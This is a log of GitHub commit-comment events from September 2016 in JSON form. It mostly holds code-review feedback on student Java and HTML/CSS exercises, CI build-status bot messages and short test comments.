{"id":"4634773453","type":"CommitCommentEvent","actor":{"login":"H-Jeong"},"repo":{"name":"dake-datascience/python"},"payload":{"comment":{"id":19218241,"position":null,"line":null,"path":null,"commit_id":"bb039dc3632b726b29eb1e1adf5dcb8d05b79224","created_at":"2016-09-29T03:04:54Z","updated_at":"2016-09-29T03:04:54Z","body":"aaa"}},"created_at":"2016-09-29T03:04:54Z"}
{"id":"4634773886","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19218243,"position":25,"line":25,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"12d36e7742ef5d8fd656ba3be06aa34533815485","created_at":"2016-09-29T03:05:02Z","updated_at":"2016-09-29T03:05:02Z","body":"pode simplificar esta implementação, não?"}},"created_at":"2016-09-29T03:05:02Z"}
{"id":"4634774748","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19218246,"position":8,"line":8,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEraTest.java","commit_id":"12d36e7742ef5d8fd656ba3be06aa34533815485","created_at":"2016-09-29T03:05:20Z","updated_at":"2016-09-29T03:05:20Z","body":"Faça pelo menos mais um cenário de testse."}},"created_at":"2016-09-29T03:05:20Z"}
{"id":"4634775554","type":"CommitCommentEvent","actor":{"login":"tomekr"},"repo":{"name":"tomekr/idb"},"payload":{"comment":{"id":19218251,"position":7,"line":8,"path":"lib/gui/app_binary_tab_widget.rb","commit_id":"993e8221c721a62766bf7a7fb1301a567f9b5566","created_at":"2016-09-29T03:05:38Z","updated_at":"2016-09-29T03:05:38Z","body":"Although I think you could just call super here as the arguments will be passed up automatically? I was playing around with the following and that seems to be the case:\r\n\r\n```ruby\r\nclass Foo\r\n  def initialize(args)\r\n    puts \"in Foo: #{ args.inspect }\"\r\n  end\r\nend\r\n\r\nclass Bar < Foo\r\n  def initialize(args)\r\n    puts \"in Bar: #{ args.inspect }\"\r\n    super\r\n  end\r\nend\r\n```"}},"created_at":"2016-09-29T03:05:38Z"}
{"id":"4634778666","type":"CommitCommentEvent","actor":{"login":"packageman"},"repo":{"name":"packageman/docker-dev"},"payload":{"comment":{"id":19218257,"position":null,"line":null,"path":null,"commit_id":"34b6412511bc23180210ad190b338d7b1a1c68a8","created_at":"2016-09-29T03:06:44Z","updated_at":"2016-09-29T03:06:44Z","body":"低调低调 :laughing: "}},"created_at":"2016-09-29T03:06:44Z"}
{"id":"4634778996","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-forms"},"payload":{"comment":{"id":19218258,"position":36,"line":36,"path":"relaxr-contact-form/register.html","commit_id":"612b8906d71fb8217d2989692121ec87277c7d05","created_at":"2016-09-29T03:06:53Z","updated_at":"2016-09-29T03:06:53Z","body":"Great job adding in the required attribute!"}},"created_at":"2016-09-29T03:06:53Z"}
{"id":"4634781399","type":"CommitCommentEvent","actor":{"login":"jgoppert"},"repo":{"name":"PX4/sitl_gazebo"},"payload":{"comment":{"id":19218265,"position":null,"line":null,"path":null,"commit_id":"1cb5bd7d218ee3a6c909361e489634120dd9eaa3","created_at":"2016-09-29T03:07:40Z","updated_at":"2016-09-29T03:07:40Z","body":"Will try this out and check the ruler angles, should be really useful."}},"created_at":"2016-09-29T03:07:40Z"}
{"id":"4634782907","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-forms"},"payload":{"comment":{"id":19218267,"position":41,"line":41,"path":"relaxr-contact-form/register.html","commit_id":"612b8906d71fb8217d2989692121ec87277c7d05","created_at":"2016-09-29T03:08:15Z","updated_at":"2016-09-29T03:08:15Z","body":"Perhaps a more efficient way to create a dropdown with this many options is to use and array of names and append their value."}},"created_at":"2016-09-29T03:08:15Z"}
{"id":"4634785889","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-forms"},"payload":{"comment":{"id":19218271,"position":261,"line":261,"path":"relaxr-contact-form/css/style.css","commit_id":"612b8906d71fb8217d2989692121ec87277c7d05","created_at":"2016-09-29T03:09:17Z","updated_at":"2016-09-29T03:09:17Z","body":"Great job keeping your CSS DRY and reusing as many properties as possible!"}},"created_at":"2016-09-29T03:09:17Z"}
{"id":"4634785900","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19218272,"position":13,"line":20,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"05b4ac57a2eb45b650d558b11fc295ae18e8801e","created_at":"2016-09-29T03:09:17Z","updated_at":"2016-09-29T03:09:17Z","body":"⚠️ ⚠️ ⚠️ \r\n\r\nSe você deixar este método público, permitirá que agentes externos influenciem na experiência do Dwarf. Isso quebra as regras de encapsulamento. Além do mais, este método é chamado apenas dentro desta classe, concorda?"}},"created_at":"2016-09-29T03:09:17Z"}
{"id":"4634786618","type":"CommitCommentEvent","actor":{"login":"xld3"},"repo":{"name":"xld3/AppleJuice"},"payload":{"comment":{"id":19218275,"position":39,"line":39,"path":"js/print.js","commit_id":"957988d16b06acbf0dd977ece1a1ca6a6353cb8a","created_at":"2016-09-29T03:09:34Z","updated_at":"2016-09-29T03:09:34Z","body":"1"}},"created_at":"2016-09-29T03:09:34Z"}
{"id":"4634787587","type":"CommitCommentEvent","actor":{"login":"aglasan"},"repo":{"name":"aglasan/plant"},"payload":{"comment":{"id":19218277,"position":null,"line":null,"path":null,"commit_id":"f5118b6f81292c4b32fffabecb7f553100dee901","created_at":"2016-09-29T03:09:59Z","updated_at":"2016-09-29T03:09:59Z","body":"ok"}},"created_at":"2016-09-29T03:09:59Z"}
{"id":"4634791590","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19218288,"position":7,"line":37,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"002125b424aa2bbc06cdd26beb9bfd6e6eac86ac","created_at":"2016-09-29T03:11:28Z","updated_at":"2016-09-29T03:11:28Z","body":"pode fazer direto:\r\n\r\n```Java\r\nif (dataNascimento.ehBissexto() && getVida()>=80 && getVida()<=90) {\r\n}\r\n```"}},"created_at":"2016-09-29T03:11:28Z"}
{"id":"4634791853","type":"CommitCommentEvent","actor":{"login":"fwolf"},"repo":{"name":"jerrybendy/phpstorm-webstorm-skills"},"payload":{"comment":{"id":19218289,"position":40,"line":24,"path":"docs/002.keyboard-shortcuts-you-cannot-miss.md","commit_id":"0df6b7a14aea310a71efabcc6ad7d660c27412f0","created_at":"2016-09-29T03:11:34Z","updated_at":"2016-09-29T03:11:34Z","body":"有时候空格无法对齐，让我很无语。\r\n\r\n![2016-09-29-111004_752x668_scrot](https://cloud.githubusercontent.com/assets/67877/18939781/6c6653fe-8635-11e6-96d9-873c5379a21a.png)\r\n"}},"created_at":"2016-09-29T03:11:34Z"}
{"id":"4634792631","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19218294,"position":null,"line":null,"path":null,"commit_id":"2ddd61854beff71050a9aa4e38152cec2b4c3567","created_at":"2016-09-29T03:11:52Z","updated_at":"2016-09-29T03:11:52Z","body":"#1"}},"created_at":"2016-09-29T03:11:52Z"}
{"id":"4634792685","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19218295,"position":12,"line":42,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"002125b424aa2bbc06cdd26beb9bfd6e6eac86ac","created_at":"2016-09-29T03:11:53Z","updated_at":"2016-09-29T03:11:53Z","body":"pode parecer bobagem, mas `101` foi repetido 2 vezes neste código. Poderia ser melhor."}},"created_at":"2016-09-29T03:11:53Z"}
{"id":"4634794353","type":"CommitCommentEvent","actor":{"login":"dingding231"},"repo":{"name":"Addisonbean/Beowulf"},"payload":{"comment":{"id":19218300,"position":null,"line":null,"path":null,"commit_id":"7efc7c93c10a29e4f5c2263b1a36160186d2c19c","created_at":"2016-09-29T03:12:30Z","updated_at":"2016-09-29T03:12:30Z","body":"There is some kind of updating bug that is causes the xp meter not to update immediately. "}},"created_at":"2016-09-29T03:12:30Z"}
{"id":"4634795298","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19218303,"position":14,"line":108,"path":"src/modulo-01-java-OO/modulo-01/DwarfTest.java","commit_id":"002125b424aa2bbc06cdd26beb9bfd6e6eac86ac","created_at":"2016-09-29T03:12:52Z","updated_at":"2016-09-29T03:12:52Z","body":"Essa asserção está genérica, é melhor colocar exatamente qual o número que você espera que retorne."}},"created_at":"2016-09-29T03:12:52Z"}
{"id":"4634809328","type":"CommitCommentEvent","actor":{"login":"HanLin0516"},"repo":{"name":"kirolan/Practice"},"payload":{"comment":{"id":19218330,"position":null,"line":null,"path":null,"commit_id":"7a3a13b3b0a4764cb7873c07d95a0357e442d6d4","created_at":"2016-09-29T03:18:21Z","updated_at":"2016-09-29T03:18:21Z","body":"开头，我有一个梦想，这句话太耳熟能详了，所以不需要解释。要是我我会这么开头(有私货，看看就可别当真)：我有一个梦想。我们都有一个梦想。有些人于梦中想，有些人梦而不想…你原先的结构从梦跳到执行意图有点不够自然，可以再发点力。"}},"created_at":"2016-09-29T03:18:21Z"}
{"id":"4634810880","type":"CommitCommentEvent","actor":{"login":"sogoyi"},"repo":{"name":"sogoyi/first"},"payload":{"comment":{"id":19218331,"position":3,"line":3,"path":"测试.txt","commit_id":"65d0650c8ca51a476bef74feda7e4c9de17e5d7e","created_at":"2016-09-29T03:18:57Z","updated_at":"2016-09-29T03:18:57Z","body":"123131"}},"created_at":"2016-09-29T03:18:57Z"}
{"id":"4634811043","type":"CommitCommentEvent","actor":{"login":"sogoyi"},"repo":{"name":"sogoyi/first"},"payload":{"comment":{"id":19218332,"position":3,"line":3,"path":"测试.txt","commit_id":"65d0650c8ca51a476bef74feda7e4c9de17e5d7e","created_at":"2016-09-29T03:19:01Z","updated_at":"2016-09-29T03:19:01Z","body":"12"}},"created_at":"2016-09-29T03:19:01Z"}
{"id":"4634811390","type":"CommitCommentEvent","actor":{"login":"sogoyi"},"repo":{"name":"sogoyi/first"},"payload":{"comment":{"id":19218335,"position":1,"line":1,"path":"测试.txt","commit_id":"65d0650c8ca51a476bef74feda7e4c9de17e5d7e","created_at":"2016-09-29T03:19:09Z","updated_at":"2016-09-29T03:19:09Z","body":"dd"}},"created_at":"2016-09-29T03:19:09Z"}
{"id":"4634811579","type":"CommitCommentEvent","actor":{"login":"fredrb"},"repo":{"name":"fredrb/spaceExplorer"},"payload":{"comment":{"id":19218336,"position":null,"line":null,"path":null,"commit_id":"7974fcf3dfecdc0e1b0195e7415207de651b60d4","created_at":"2016-09-29T03:19:14Z","updated_at":"2016-09-29T03:19:14Z","body":"Closing: #3 "}},"created_at":"2016-09-29T03:19:14Z"}
{"id":"4634812702","type":"CommitCommentEvent","actor":{"login":"ComWill"},"repo":{"name":"ComWill/hello-world"},"payload":{"comment":{"id":19218340,"position":null,"line":null,"path":null,"commit_id":"2e4d884caa35d936ec983127e77b2cd8c858c6c7","created_at":"2016-09-29T03:19:39Z","updated_at":"2016-09-29T03:19:39Z","body":"test 1"}},"created_at":"2016-09-29T03:19:39Z"}
{"id":"4634814327","type":"CommitCommentEvent","actor":{"login":"aprsa"},"repo":{"name":"phoebe-project/phoebe2"},"payload":{"comment":{"id":19218341,"position":null,"line":null,"path":null,"commit_id":"2caed9e639e4dfb55f27ff25c90d2a3e0b20dc79","created_at":"2016-09-29T03:20:16Z","updated_at":"2016-09-29T03:20:16Z","body":"LOL!"}},"created_at":"2016-09-29T03:20:16Z"}
{"id":"4634815070","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19218344,"position":31,"line":30,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"f49f6a83472a32d1df37a741cbcf54f815aa8d91","created_at":"2016-09-29T03:20:33Z","updated_at":"2016-09-29T03:20:33Z","body":"pode melhorar se colocar um && no if da linha 29 com o da 30."}},"created_at":"2016-09-29T03:20:33Z"}
{"id":"4634815634","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19218345,"position":null,"line":null,"path":null,"commit_id":"9698469ff427a196c9e50cac23ae483cc19a4058","created_at":"2016-09-29T03:20:45Z","updated_at":"2016-09-29T03:20:45Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=86)"}},"created_at":"2016-09-29T03:20:45Z"}
{"id":"4634815639","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19218346,"position":null,"line":null,"path":null,"commit_id":"195f46cf97ca5f4622ad5a1c261a0d515531be85","created_at":"2016-09-29T03:20:45Z","updated_at":"2016-09-29T03:20:45Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=86)"}},"created_at":"2016-09-29T03:20:45Z"}
{"id":"4634818888","type":"CommitCommentEvent","actor":{"login":"mateusbpt"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19218351,"position":22,"line":26,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3392a48023666197edabfbb11aeefae560298757","created_at":"2016-09-29T03:21:55Z","updated_at":"2016-09-29T03:21:55Z","body":"Classe ajustada."}},"created_at":"2016-09-29T03:21:55Z"}
{"id":"4634819135","type":"CommitCommentEvent","actor":{"login":"XTCLiu"},"repo":{"name":"XTCLiu/aaaa"},"payload":{"comment":{"id":19218352,"position":null,"line":null,"path":null,"commit_id":"15be32ce6e98e04108a124e12694c4d60a99062f","created_at":"2016-09-29T03:22:01Z","updated_at":"2016-09-29T03:22:01Z","body":"a "}},"created_at":"2016-09-29T03:22:01Z"}
{"id":"4634822834","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/relaxr-registration"},"payload":{"comment":{"id":19218363,"position":266,"line":266,"path":"Assignment 8/relaxr_registration/css/style.css","commit_id":"9644d2d47920706f2914af370ad12e8d0c6223f6","created_at":"2016-09-29T03:23:29Z","updated_at":"2016-09-29T03:23:29Z","body":"Nice job making all your fields uniform! To keep your code try, perhaps trying writing the properties once and applying it to all three classes. Something like:\r\n\r\n```\r\ninput[type=text], input[type=email], input[type=password] {\r\n  padding: 8px 12px;\r\n  float: right;\r\n  margin-right: 500px;\r\n}"}},"created_at":"2016-09-29T03:23:29Z"}
{"id":"4634823719","type":"CommitCommentEvent","actor":{"login":"canjoe2233"},"repo":{"name":"TravisHoover/Simple-Card-Game"},"payload":{"comment":{"id":19218368,"position":null,"line":null,"path":null,"commit_id":"0817f4689eb7ff655ae508fc0ac5335f965e8011","created_at":"2016-09-29T03:23:49Z","updated_at":"2016-09-29T03:23:49Z","body":"@TravisHoover Stop pushing to Master ;)"}},"created_at":"2016-09-29T03:23:49Z"}
{"id":"4634824004","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19218370,"position":null,"line":null,"path":null,"commit_id":"656ccd5ab272269c6d8844d0f9b33a17b7666ec8","created_at":"2016-09-29T03:23:56Z","updated_at":"2016-09-29T03:23:56Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-29T03:23:56Z"}
{"id":"4634825338","type":"CommitCommentEvent","actor":{"login":"HanLin0516"},"repo":{"name":"kirolan/Practice"},"payload":{"comment":{"id":19218373,"position":null,"line":null,"path":null,"commit_id":"7a3a13b3b0a4764cb7873c07d95a0357e442d6d4","created_at":"2016-09-29T03:24:28Z","updated_at":"2016-09-29T03:24:28Z","body":"沙漠找水的意象非常好，你可以延用至最后，诸如涓涓细流汇成汪洋大海，你不再缺水，你有一整个大海…这种"}},"created_at":"2016-09-29T03:24:28Z"}
{"id":"4634825515","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19218374,"position":24,"line":27,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"f1038f7ff925477f9248520845b43e0931bfbfc9","created_at":"2016-09-29T03:24:32Z","updated_at":"2016-09-29T03:24:32Z","body":"Cuidado. O exercício fala em \"Caso contrário, o Dwarf receberá a flechada (como está hoje).\", que é diferente de apenas \"if\"."}},"created_at":"2016-09-29T03:24:32Z"}
{"id":"4634826427","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19218379,"position":18,"line":21,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"f1038f7ff925477f9248520845b43e0931bfbfc9","created_at":"2016-09-29T03:24:53Z","updated_at":"2016-09-29T03:24:53Z","body":"Faltaram testes para essa nova implementação."}},"created_at":"2016-09-29T03:24:53Z"}
{"id":"4634828014","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/relaxr-registration"},"payload":{"comment":{"id":19218383,"position":39,"line":39,"path":"Assignment 8/relaxr_registration/register.html","commit_id":"9644d2d47920706f2914af370ad12e8d0c6223f6","created_at":"2016-09-29T03:25:29Z","updated_at":"2016-09-29T03:25:29Z","body":"Nice job using placeholder text on your forms, perhaps try making your inputs wider. Right now not all of your placeholder text is visible to the user."}},"created_at":"2016-09-29T03:25:29Z"}
{"id":"4634833635","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"nanaluisa/crescer-2016-2"},"payload":{"comment":{"id":19218387,"position":24,"line":24,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"0aa70deaffd0f1e33a4de051651eb340b23528b5","created_at":"2016-09-29T03:27:41Z","updated_at":"2016-09-29T03:27:41Z","body":"Tente encontrar situações em comum entre todos esses returns que você está fazendo. Note que em mais de uma linha você faz return true e em mais de uma linha você faz return false. Isso é um indicativo de que pode agrupar as condições e deixá-las mais genéricas."}},"created_at":"2016-09-29T03:27:41Z"}
{"id":"4634833800","type":"CommitCommentEvent","actor":{"login":"TravisHoover"},"repo":{"name":"TravisHoover/Simple-Card-Game"},"payload":{"comment":{"id":19218389,"position":null,"line":null,"path":null,"commit_id":"0817f4689eb7ff655ae508fc0ac5335f965e8011","created_at":"2016-09-29T03:27:45Z","updated_at":"2016-09-29T03:27:45Z","body":"Haha! Bad practice, I know."}},"created_at":"2016-09-29T03:27:45Z"}
{"id":"4634835726","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"nanaluisa/crescer-2016-2"},"payload":{"comment":{"id":19218393,"position":14,"line":14,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEraTest.java","commit_id":"3cab355b068e2d636b9cc821cd14cd73f3c78857","created_at":"2016-09-29T03:28:33Z","updated_at":"2016-09-29T03:28:33Z","body":"Pode simplificar com o ```assertTrue(data.ehBissexto());```"}},"created_at":"2016-09-29T03:28:33Z"}
{"id":"4634835763","type":"CommitCommentEvent","actor":{"login":"J-F-Liu"},"repo":{"name":"nickel-org/nickel.rs"},"payload":{"comment":{"id":19218394,"position":29,"line":36,"path":"src/query_string.rs","commit_id":"1e453409ffbefddcb6015fb47ab388c7bc21c698","created_at":"2016-09-29T03:28:33Z","updated_at":"2016-09-29T03:28:33Z","body":"Use `&` instead of `&mut` in `fn eval(req: &mut Request) -> Result<Query, ()> `?"}},"created_at":"2016-09-29T03:28:33Z"}
{"id":"4634837030","type":"CommitCommentEvent","actor":{"login":"hamster6711"},"repo":{"name":"hamster6711/my-website"},"payload":{"comment":{"id":19218396,"position":null,"line":null,"path":null,"commit_id":"89933a570cf5ac3bad06e7e8d00e76d27a393401","created_at":"2016-09-29T03:29:02Z","updated_at":"2016-09-29T03:29:02Z","body":"Edited aboutme, home page, uploaded some new html files"}},"created_at":"2016-09-29T03:29:02Z"}
{"id":"4634837424","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19218399,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T03:29:12Z","updated_at":"2016-09-29T03:29:12Z","body":"\r\n![](https://assets-cdn.github.com/images/icons/emoji/unicode/1f602.png)\r\n我在想C# 应该也能写DSL吧"}},"created_at":"2016-09-29T03:29:12Z"}
{"id":"4634842644","type":"CommitCommentEvent","actor":{"login":"dainmiller"},"repo":{"name":"startherellc/coaching-students"},"payload":{"comment":{"id":19218404,"position":null,"line":null,"path":null,"commit_id":"978869bd480f832cf9149de2641197adbdd74248","created_at":"2016-09-29T03:31:10Z","updated_at":"2016-09-29T03:31:10Z","body":"Please confirm this commit contains all the changes you made? \r\n\r\nJust trying to get the commit smaller so its possible to review :) "}},"created_at":"2016-09-29T03:31:10Z"}
{"id":"4634846421","type":"CommitCommentEvent","actor":{"login":"jtb8vm"},"repo":{"name":"ei-creative/safeMe"},"payload":{"comment":{"id":19218408,"position":null,"line":null,"path":null,"commit_id":"66252ad5ff049b0b41c19d1fe0c4fe918efa1880","created_at":"2016-09-29T03:32:40Z","updated_at":"2016-09-29T03:32:40Z","body":"AppConstants have been refreshed."}},"created_at":"2016-09-29T03:32:40Z"}
{"id":"4634846505","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19218409,"position":null,"line":null,"path":null,"commit_id":"1d92e338c264c5af0734a4dc4c121be9a086ef2a","created_at":"2016-09-29T03:32:42Z","updated_at":"2016-09-29T03:32:42Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2199 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.07%25-red.svg)</a> \n"}},"created_at":"2016-09-29T03:32:42Z"}
{"id":"4634850824","type":"CommitCommentEvent","actor":{"login":"xavier-rdo"},"repo":{"name":"manala/manala"},"payload":{"comment":{"id":19218416,"position":61,"line":81,"path":"src/Command/CheckRequirements.php","commit_id":"fb1d1e27d26593dfcd4c323c9e4675e7764a7ba8","created_at":"2016-09-29T03:34:26Z","updated_at":"2016-09-29T03:34:26Z","body":"```diff\r\n- if ($help = $violation->getHelp()) {\r\n+ if ($help == $violation->getHelp()) {\r\n```"}},"created_at":"2016-09-29T03:34:26Z"}
{"id":"4634859532","type":"CommitCommentEvent","actor":{"login":"mloebens"},"repo":{"name":"mloebens/crescer-2016-2"},"payload":{"comment":{"id":19218436,"position":24,"line":27,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"f1038f7ff925477f9248520845b43e0931bfbfc9","created_at":"2016-09-29T03:37:51Z","updated_at":"2016-09-29T03:37:51Z","body":"Não entendi, esta parte do código representa exatamente como estava antes. Podes me dizer onde errei?"}},"created_at":"2016-09-29T03:37:51Z"}
{"id":"4634863514","type":"CommitCommentEvent","actor":{"login":"ruby452"},"repo":{"name":"open-power/common-mrw-xml"},"payload":{"comment":{"id":19218459,"position":null,"line":null,"path":null,"commit_id":"d974d22533d8e299a6508d46c5ebd31a1c5f8bdd","created_at":"2016-09-29T03:39:33Z","updated_at":"2016-09-29T03:39:33Z","body":"Added new RAIL_NAME attribute values for the standby and I/O VRMs. "}},"created_at":"2016-09-29T03:39:33Z"}
{"id":"4634865379","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"allisonhall/relaxr-registration"},"payload":{"comment":{"id":19218469,"position":75,"line":75,"path":"Assignment 8/relaxr_registration/register.html","commit_id":"9644d2d47920706f2914af370ad12e8d0c6223f6","created_at":"2016-09-29T03:40:17Z","updated_at":"2016-09-29T03:40:17Z","body":"Watch out for nesting your elements. If you take out the form content for a moment, you'll see that your HTML elements align like this:\r\n```\r\n<section>\r\n    <div>\r\n        <section>\r\n            <form>\r\n                <!-- form content -->\r\n             </section>\r\n         </div>\r\n     </form>\r\n</section>\r\n```\r\nTry to keep them all nested within each other like this: \r\n```\r\n<section>\r\n    <div>\r\n        <section>\r\n            <form>\r\n                <!-- form content -->\r\n             </form>\r\n         </section>\r\n     </div>\r\n</section>\r\n```\r\n\r\nIt can be tricky to catch when you have a lot of code, so one way you can check your HTML when you are done is by copying and pasting it into a validator and it will tell you any errors. Here is a helpful resource to use https://validator.w3.org/#validate_by_input"}},"created_at":"2016-09-29T03:40:17Z"}
{"id":"4634866371","type":"CommitCommentEvent","actor":{"login":"simonhampel"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":19218470,"position":null,"line":null,"path":null,"commit_id":"38684f94871e66a599644b605b02c4bcac3ea088","created_at":"2016-09-29T03:40:38Z","updated_at":"2016-09-29T03:40:38Z","body":"Awesome - fixed a problem I was having. Thanks."}},"created_at":"2016-09-29T03:40:38Z"}
{"id":"4634871127","type":"CommitCommentEvent","actor":{"login":"dsavenko"},"repo":{"name":"ctuning/ck-crowdnode"},"payload":{"comment":{"id":19218473,"position":7,"line":152,"path":"src/ck-crowdnode-server.c","commit_id":"d684eac89c5218c3bbaae1db928facb0e3917317","created_at":"2016-09-29T03:42:39Z","updated_at":"2016-09-29T03:42:39Z","body":"Should we change the content type to application/json?"}},"created_at":"2016-09-29T03:42:39Z"}
{"id":"4634874908","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19218480,"position":null,"line":null,"path":null,"commit_id":"2f4b3d0932144857abac59e13f20dc20f55798a2","created_at":"2016-09-29T03:44:10Z","updated_at":"2016-09-29T03:44:10Z","body":"Sounds good. I'll compile the branch and give it a thorough testing with my PEX setup as soon as the next commit comes through; verifying inheritance, ladders, prioritization, individual perm injections to bypass group negates, wildcard flags, etc. to see if they all work fine and similarly to current upstream branch. \r\n\r\nHopefully your fork ends up being a suitable 'active development' replacement and a nice performance boost overall. :) Do let me know if you'd like a current revision of my PEX file for testing, with or without user grouping included to test load lag from flatfile with tens of thousands of users grouped."}},"created_at":"2016-09-29T03:44:10Z"}
{"id":"4634877977","type":"CommitCommentEvent","actor":{"login":"holcom73"},"repo":{"name":"holcom73/github-workflow-13"},"payload":{"comment":{"id":19218483,"position":null,"line":null,"path":null,"commit_id":"a29f653e544f56ad81f3d55eb7d5520b0b298bc8","created_at":"2016-09-29T03:45:22Z","updated_at":"2016-09-29T03:45:22Z","body":"first new file"}},"created_at":"2016-09-29T03:45:22Z"}
{"id":"4634881526","type":"CommitCommentEvent","actor":{"login":"liuhuanjim013"},"repo":{"name":"mujin/mujinvision"},"payload":{"comment":{"id":19218487,"position":4,"line":2979,"path":"src/mujinvisionmanager.cpp","commit_id":"0f3ea43178a9e0a0caa512c31902a4557a4472e4","created_at":"2016-09-29T03:46:44Z","updated_at":"2016-09-29T03:46:44Z","body":"for rv system"}},"created_at":"2016-09-29T03:46:44Z"}
{"id":"4634881985","type":"CommitCommentEvent","actor":{"login":"SkyFire"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19218489,"position":null,"line":null,"path":null,"commit_id":"8bfd1d6afd3428159a0176fd3e91fc82f0624c9e","created_at":"2016-09-29T03:46:53Z","updated_at":"2016-09-29T03:46:53Z","body":"Post your travis link so I can look at it.\r\nAlso the date and has revision will not show up because the github repo is not setup correctly."}},"created_at":"2016-09-29T03:46:53Z"}
{"id":"4634882217","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"Phoenix616/ChestShopNotifier"},"payload":{"comment":{"id":19218490,"position":null,"line":null,"path":null,"commit_id":"eb0a2b77a7d9350249acc49ae29573c20b618737","created_at":"2016-09-29T03:46:57Z","updated_at":"2016-09-29T03:46:57Z","body":"Take a look at this fork. May be nice to swap over to and use from here on out since active development of chestshops has slowed down drastically / stopped. :)\r\nhttps://github.com/dmulloy2/ChestShop-3\r\n\r\nBeen working with dmulloy to fix quite a few issues in chestshops. Including many exceptions, odd case scenarios, removing the UUID kicking, re-adding suppression, and even including one of your commit fixes in your fork."}},"created_at":"2016-09-29T03:46:57Z"}
{"id":"4634884176","type":"CommitCommentEvent","actor":{"login":"mateusbpt"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19218493,"position":25,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3392a48023666197edabfbb11aeefae560298757","created_at":"2016-09-29T03:47:38Z","updated_at":"2016-09-29T03:47:38Z","body":"Ajustado."}},"created_at":"2016-09-29T03:47:38Z"}
